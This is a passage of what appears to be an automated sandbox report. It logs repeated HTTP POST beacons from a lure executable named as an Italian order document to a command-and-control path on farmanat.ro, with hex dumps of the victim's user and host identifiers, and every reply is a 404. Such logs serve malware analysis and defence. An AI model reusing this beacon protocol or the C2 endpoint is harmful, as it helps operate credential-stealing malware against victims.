Nov 25, 2021 10:55:01.418915033 CET	7441	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:01.453049898 CET	7441	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:01.505518913 CET	7441	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
818	192.168.11.20	50666	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:01.928400993 CET	7442	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:01.962481976 CET	7442	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:02.012738943 CET	7443	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
819	192.168.11.20	50667	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:02.442047119 CET	7443	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:02.476366043 CET	7444	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:02.572565079 CET	7444	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.11.20	49919	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:52.111717939 CET	6429	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:52.145091057 CET	6429	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:52.198276997 CET	6429	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
820	192.168.11.20	50668	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:02.979042053 CET	7445	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:03.013314009 CET	7445	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:03.093652964 CET	7445	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
821	192.168.11.20	50669	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:03.513245106 CET	7446	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:03.546888113 CET	7446	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:03.610613108 CET	7447	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
822	192.168.11.20	50670	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:03.981456995 CET	7447	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:04.014763117 CET	7448	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:04.066714048 CET	7448	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
823	192.168.11.20	50671	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:04.538402081 CET	7449	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:04.572664022 CET	7449	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:04.624690056 CET	7449	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
824	192.168.11.20	50672	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:05.052794933 CET	7450	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:05.087060928 CET	7450	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:05.137243986 CET	7451	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
825	192.168.11.20	50673	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:05.569176912 CET	7451	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:05.603360891 CET	7452	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:05.660506010 CET	7452	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
826	192.168.11.20	50674	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:06.082835913 CET	7453	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:06.117062092 CET	7453	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:06.169486046 CET	7453	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
827	192.168.11.20	50675	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:06.598788977 CET	7454	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:06.632414103 CET	7454	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:06.694299936 CET	7455	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
828	192.168.11.20	50676	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:07.053124905 CET	7455	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:07.086771011 CET	7456	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:07.137895107 CET	7456	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
829	192.168.11.20	50677	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:07.557349920 CET	7457	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:07.591834068 CET	7457	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:07.641962051 CET	7457	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.11.20	49920	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:52.644465923 CET	6430	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:52.677970886 CET	6430	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:52.727838993 CET	6431	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
830	192.168.11.20	50678	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:08.069897890 CET	7458	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:08.103163004 CET	7458	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:08.153906107 CET	7459	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
831	192.168.11.20	50679	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:08.535660028 CET	7459	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:08.569844961 CET	7460	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:08.619822979 CET	7460	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
832	192.168.11.20	50680	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:08.993230104 CET	7461	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:09.027662039 CET	7461	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:09.086581945 CET	7461	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
833	192.168.11.20	50681	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:09.501049995 CET	7462	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:09.534815073 CET	7462	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:09.590336084 CET	7463	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
834	192.168.11.20	50682	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:10.027945995 CET	7463	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:10.062144995 CET	7464	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:55:10.113701105 CET	7464	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:55:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
835	192.168.11.20	50683	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:55:10.499800920 CET	7465	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:55:10.533844948 CET	7465	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
